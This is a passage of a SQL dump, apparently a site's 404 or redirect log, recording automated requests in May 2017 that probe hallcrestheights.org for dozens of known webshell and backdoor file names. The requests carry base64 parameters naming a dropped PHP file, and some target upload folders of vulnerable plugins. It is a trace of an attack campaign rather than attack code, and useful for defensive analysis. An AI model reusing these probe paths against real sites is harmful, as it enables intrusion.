00:00:00'),(10117,'http://hallcrestheights.org/install.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:46:50','0000-00-00 00:00:00'),(10118,'http://hallcrestheights.org/images/1ndex.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:48:26','0000-00-00 00:00:00'),(10119,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=SjFnSWo0LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:48:38','0000-00-00 00:00:00'),(10120,'http://hallcrestheights.org/resd.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:47:29','0000-00-00 00:00:00'),(10121,'http://hallcrestheights.org/injctory.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:47:39','0000-00-00 00:00:00'),(10122,'http://hallcrestheights.org/mmytc.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:49:08','0000-00-00 00:00:00'),(10123,'http://hallcrestheights.org/images/laj.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:49:25','0000-00-00 00:00:00'),(10124,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=SjFnSWo0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:48:13','0000-00-00 00:00:00'),(10125,'http://hallcrestheights.org/wsdl.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:49:47','0000-00-00 00:00:00'),(10126,'http://hallcrestheights.org/goog1es.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:49:59','0000-00-00 00:00:00'),(10127,'http://hallcrestheights.org/wp-admin/network/rnnvhs.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:50:09','0000-00-00 00:00:00'),(10128,'http://hallcrestheights.org/wp-admin/about.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:50:16','0000-00-00 00:00:00'),(10129,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=SjFnSWo0LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:50:25','0000-00-00 00:00:00'),(10130,'http://hallcrestheights.org/news.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:50:48','0000-00-00 00:00:00'),(10131,'http://hallcrestheights.org/SessionController.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:00','0000-00-00 00:00:00'),(10132,'http://hallcrestheights.org/maill.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:11','0000-00-00 00:00:00'),(10133,'http://hallcrestheights.org/error-log.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:29','0000-00-00 00:00:00'),(10134,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:37','0000-00-00 00:00:00'),(10135,'http://hallcrestheights.org/authenticating.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:45','0000-00-00 00:00:00'),(10136,'http://hallcrestheights.org/google-assist.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:56','0000-00-00 00:00:00'),(10137,'http://hallcrestheights.org/images/google-assist.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:52:07','0000-00-00 00:00:00'),(10138,'http://hallcrestheights.org/images/robots.txt.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:52:20','0000-00-00 00:00:00'),(10139,'http://hallcrestheights.org/elements.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:52:33','0000-00-00 00:00:00'),(10140,'http://hallcrestheights.org/xmlsrpc.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:52:45','0000-00-00 00:00:00'),(10141,'http://hallcrestheights.org/wp-cache.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:31','0000-00-00 00:00:00'),(10142,'http://hallcrestheights.org/images/404.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:41','0000-00-00 00:00:00'),(10143,'http://hallcrestheights.org/images/head.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:51:52','0000-00-00 00:00:00'),(10144,'http://hallcrestheights.org/cache/support.php?z3=SjFnSWo0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:53:25','0000-00-00 00:00:00'),(10145,'http://hallcrestheights.org/RoseLeif.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:53:38','0000-00-00 00:00:00'),(10146,'http://hallcrestheights.org/Abbrevsprl.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:53:50','0000-00-00 00:00:00'),(10147,'http://hallcrestheights.org/show.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:52:42','0000-00-00 00:00:00'),(10148,'http://hallcrestheights.org/images/defau1t.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:54:13','0000-00-00 00:00:00'),(10149,'http://hallcrestheights.org/cli/40dd1d.php?z3=SjFnSWo0LnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:53:01','0000-00-00 00:00:00'),(10150,'http://hallcrestheights.org/bk.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:53:11','0000-00-00 00:00:00'),(10151,'http://hallcrestheights.org/infos.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:54:51','0000-00-00 00:00:00'),(10152,'http://hallcrestheights.org/cache/defau1t.php?z3=SjFnSWo0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:54:57','0000-00-00 00:00:00'),(10153,'http://hallcrestheights.org/A.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:55:11','0000-00-00 00:00:00'),(10154,'http://hallcrestheights.org/bookmark.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:53:57','0000-00-00 00:00:00'),(10155,'http://hallcrestheights.org/wp-data.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:55:37','0000-00-00 00:00:00'),(10156,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:55:51','0000-00-00 00:00:00'),(10157,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:56:01','0000-00-00 00:00:00'),(10158,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:56:11','0000-00-00 00:00:00'),(10159,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:56:20','0000-00-00 00:00:00'),(10160,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:55:06','0000-00-00 00:00:00'),(10161,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-05-25 20:56:34','0000-00-00 00:00:00'),(10162,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:56:44','0000-00-00 00:00:00'),(10163,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:55:34','0000-00-00 00:00:00'),(10164,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:57:03','0000-00-00 00:00:00'),(10165,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:57:22','0000-00-00 00:00:00'),(10166,'http://hallcrestheights.org/head.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:57:33','0000-00-00 00:00:00'),(10167,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:57:54','0000-00-00 00:00:00'),(10168,'http://hallcrestheights.org/wp-content/plugins/morepaddy.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:04','0000-00-00 00:00:00'),(10169,'http://hallcrestheights.org/cache/list.php?z3=SjFnSWo0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:17','0000-00-00 00:00:00'),(10170,'http://hallcrestheights.org/images/interface.php?z3=SjFnSWo0LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:26','0000-00-00 00:00:00'),(10171,'http://hallcrestheights.org/sqldebug.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:38','0000-00-00 00:00:00'),(10172,'http://hallcrestheights.org/xmlrpc-activate.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:52','0000-00-00 00:00:00'),(10173,'http://hallcrestheights.org/keep.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:59:33','0000-00-00 00:00:00'),(10174,'http://hallcrestheights.org/tmpos.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:59:44','0000-00-00 00:00:00'),(10175,'http://hallcrestheights.org/link.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:35','0000-00-00 00:00:00'),(10176,'http://hallcrestheights.org/dcodzu.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:43','0000-00-00 00:00:00'),(10177,'http://hallcrestheights.org/codd.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:49','0000-00-00 00:00:00'),(10178,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=SjFnSWo0LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:58:55','0000-00-00 00:00:00'),(10179,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=SjFnSWo0LnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 21:00:19','0000-00-00 00:00:00'),(10180,'http://hallcrestheights.org/content.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:59:04','0000-00-00 00:00:00'),(10181,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 21:00:34','0000-00-00 00:00:00'),(10182,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 20:59:20','0000-00-00 00:00:00'),(10183,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=SjFnSWo0LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-25 21:00:53','0000-00-00 00:00:00'),(10184,'http://hallcrestheights.org/shootmei.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 21:01:02','0000-00-00 00:00:00'),(10185,'http://hallcrestheights.org/dcodqg.php?z3=SjFnSWo0LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-25 21:01:23','0000-00-00 00:00:00'),(10186,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/J1gIj4.php',NULL,'','',1,0,'2017-05-25 21:01:32','0000-00-00 00:00:00'),(10187,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/J1gIj4.php',NULL,'','',1,0,'2017-05-25 21:01:39','0000-00-00 00:00:00'),(10188,'http://hallcrestheights.org/wp-content/uploads/J1gIj4.php',NULL,'','',1,0,'2017-05-25 21:01:47','0000-00-00 00:00:00'),(10189,'http://hallcrestheights.org/J1gIj4.php',NULL,'','',1,0,'2017-05-25 21:01:50','0000-00-00 00:00:00'),(10190,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/J1gIj4.php',NULL,'','',1,0,'2017-05-25 21:00:34','0000-00-00 00:00:00'),(10191,'http://hallcrestheights.org/sqlbak.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-26 00:09:55','0000-00-00 00:00:00'),(10192,'http://hallcrestheights.org/sql-bak.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:09:59','0000-00-00 00:00:00'),(10193,'http://hallcrestheights.org/email.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:10:06','0000-00-00 00:00:00'),(10194,'http://hallcrestheights.org/functions.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:10:13','0000-00-00 00:00:00'),(10195,'http://hallcrestheights.org/cache/news.php?z3=eDloN0tKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:10:25','0000-00-00 00:00:00'),(10196,'http://hallcrestheights.org/shootme.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-05-26 00:10:39','0000-00-00 00:00:00'),(10197,'http://hallcrestheights.org/configurationbak.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:10:45','0000-00-00 00:00:00'),(10198,'http://hallcrestheights.org/robots.txt.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:10:51','0000-00-00 00:00:00'),(10199,'http://hallcrestheights.org/jconfig.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:10:58','0000-00-00 00:00:00'),(10200,'http://hallcrestheights.org/media/reads.php?z3=eDloN0tKLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:11:04','0000-00-00 00:00:00'),(10201,'http://hallcrestheights.org/pols.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:11:08','0000-00-00 00:00:00'),(10202,'http://hallcrestheights.org/ytt.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:11:33','0000-00-00 00:00:00'),(10203,'http://hallcrestheights.org/media/1ndex.php?z3=eDloN0tKLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:12:12','0000-00-00 00:00:00'),(10204,'http://hallcrestheights.org/sql_dump.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:12:30','0000-00-00 00:00:00'),(10205,'http://hallcrestheights.org/error-logs.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:12:44','0000-00-00 00:00:00'),(10206,'http://hallcrestheights.org/media/404.php?z3=eDloN0tKLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:12:52','0000-00-00 00:00:00'),(10207,'http://hallcrestheights.org/media/tmp.php?z3=eDloN0tKLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:12:59','0000-00-00 00:00:00'),(10208,'http://hallcrestheights.org/log.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:14','0000-00-00 00:00:00'),(10209,'http://hallcrestheights.org/images/stories/0day.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:20','0000-00-00 00:00:00'),(10210,'http://hallcrestheights.org/includes/u2p.php?z3=eDloN0tKLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:26','0000-00-00 00:00:00'),(10211,'http://hallcrestheights.org/images/xxx.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:34','0000-00-00 00:00:00'),(10212,'http://hallcrestheights.org/al277.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:39','0000-00-00 00:00:00'),(10213,'http://hallcrestheights.org/wp-admin/options-media.php?z3=eDloN0tKLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:42','0000-00-00 00:00:00'),(10214,'http://hallcrestheights.org/wp-content/advanced-cache.php?z3=eDloN0tKLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:49','0000-00-00 00:00:00'),(10215,'http://hallcrestheights.org/roubt.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:12:35','0000-00-00 00:00:00'),(10216,'http://hallcrestheights.org/images/al277.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:14:04','0000-00-00 00:00:00'),(10217,'http://hallcrestheights.org/webconfig.txt.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:14:09','0000-00-00 00:00:00'),(10218,'http://hallcrestheights.org/cache/cachee.php?z3=eDloN0tKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:13:02','0000-00-00 00:00:00'),(10219,'http://hallcrestheights.org/thumb.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:14:29','0000-00-00 00:00:00'),(10220,'http://hallcrestheights.org/configbak.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:14:51','0000-00-00 00:00:00'),(10221,'http://hallcrestheights.org/wp-main.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:14:57','0000-00-00 00:00:00'),(10222,'http://hallcrestheights.org/robot.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:06','0000-00-00 00:00:00'),(10223,'http://hallcrestheights.org/install.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:14','0000-00-00 00:00:00'),(10224,'http://hallcrestheights.org/images/1ndex.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:22','0000-00-00 00:00:00'),(10225,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=eDloN0tKLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:30','0000-00-00 00:00:00'),(10226,'http://hallcrestheights.org/resd.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:38','0000-00-00 00:00:00'),(10227,'http://hallcrestheights.org/injctory.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:46','0000-00-00 00:00:00'),(10228,'http://hallcrestheights.org/mmytc.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:53','0000-00-00 00:00:00'),(10229,'http://hallcrestheights.org/images/laj.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:16:09','0000-00-00 00:00:00'),(10230,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=eDloN0tKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:16:18','0000-00-00 00:00:00'),(10231,'http://hallcrestheights.org/wsdl.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:16:23','0000-00-00 00:00:00'),(10232,'http://hallcrestheights.org/goog1es.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:16:29','0000-00-00 00:00:00'),(10233,'http://hallcrestheights.org/wp-admin/network/rnnvhs.php?z3=eDloN0tKLnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:16:36','0000-00-00 00:00:00'),(10234,'http://hallcrestheights.org/wp-admin/about.php?z3=eDloN0tKLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:16:45','0000-00-00 00:00:00'),(10235,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=eDloN0tKLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:16:52','0000-00-00 00:00:00'),(10236,'http://hallcrestheights.org/news.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:04','0000-00-00 00:00:00'),(10237,'http://hallcrestheights.org/SessionController.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:11','0000-00-00 00:00:00'),(10238,'http://hallcrestheights.org/maill.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:15:58','0000-00-00 00:00:00'),(10239,'http://hallcrestheights.org/error-log.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:28','0000-00-00 00:00:00'),(10240,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:36','0000-00-00 00:00:00'),(10241,'http://hallcrestheights.org/authenticating.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:41','0000-00-00 00:00:00'),(10242,'http://hallcrestheights.org/google-assist.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:48','0000-00-00 00:00:00'),(10243,'http://hallcrestheights.org/images/google-assist.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:55','0000-00-00 00:00:00'),(10244,'http://hallcrestheights.org/images/robots.txt.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:01','0000-00-00 00:00:00'),(10245,'http://hallcrestheights.org/elements.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:08','0000-00-00 00:00:00'),(10246,'http://hallcrestheights.org/xmlsrpc.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:15','0000-00-00 00:00:00'),(10247,'http://hallcrestheights.org/wp-cache.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:22','0000-00-00 00:00:00'),(10248,'http://hallcrestheights.org/images/404.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:07','0000-00-00 00:00:00'),(10249,'http://hallcrestheights.org/images/head.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:33','0000-00-00 00:00:00'),(10250,'http://hallcrestheights.org/cache/support.php?z3=eDloN0tKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:38','0000-00-00 00:00:00'),(10251,'http://hallcrestheights.org/RoseLeif.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:44','0000-00-00 00:00:00'),(10252,'http://hallcrestheights.org/Abbrevsprl.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:31','0000-00-00 00:00:00'),(10253,'http://hallcrestheights.org/show.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:58','0000-00-00 00:00:00'),(10254,'http://hallcrestheights.org/images/defau1t.php?z3=eDloN0tKLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:45','0000-00-00 00:00:00'),(10255,'http://hallcrestheights.org/cli/40dd1d.php?z3=eDloN0tKLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:52','0000-00-00 00:00:00'),(10256,'http://hallcrestheights.org/bk.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:17:59','0000-00-00 00:00:00'),(10257,'http://hallcrestheights.org/infos.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:19:31','0000-00-00 00:00:00'),(10258,'http://hallcrestheights.org/cache/defau1t.php?z3=eDloN0tKLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:18:18','0000-00-00 00:00:00'),(10259,'http://hallcrestheights.org/A.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:19:46','0000-00-00 00:00:00'),(10260,'http://hallcrestheights.org/bookmark.php?z3=eDloN0tKLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-26 00:19:54','0000-00-00 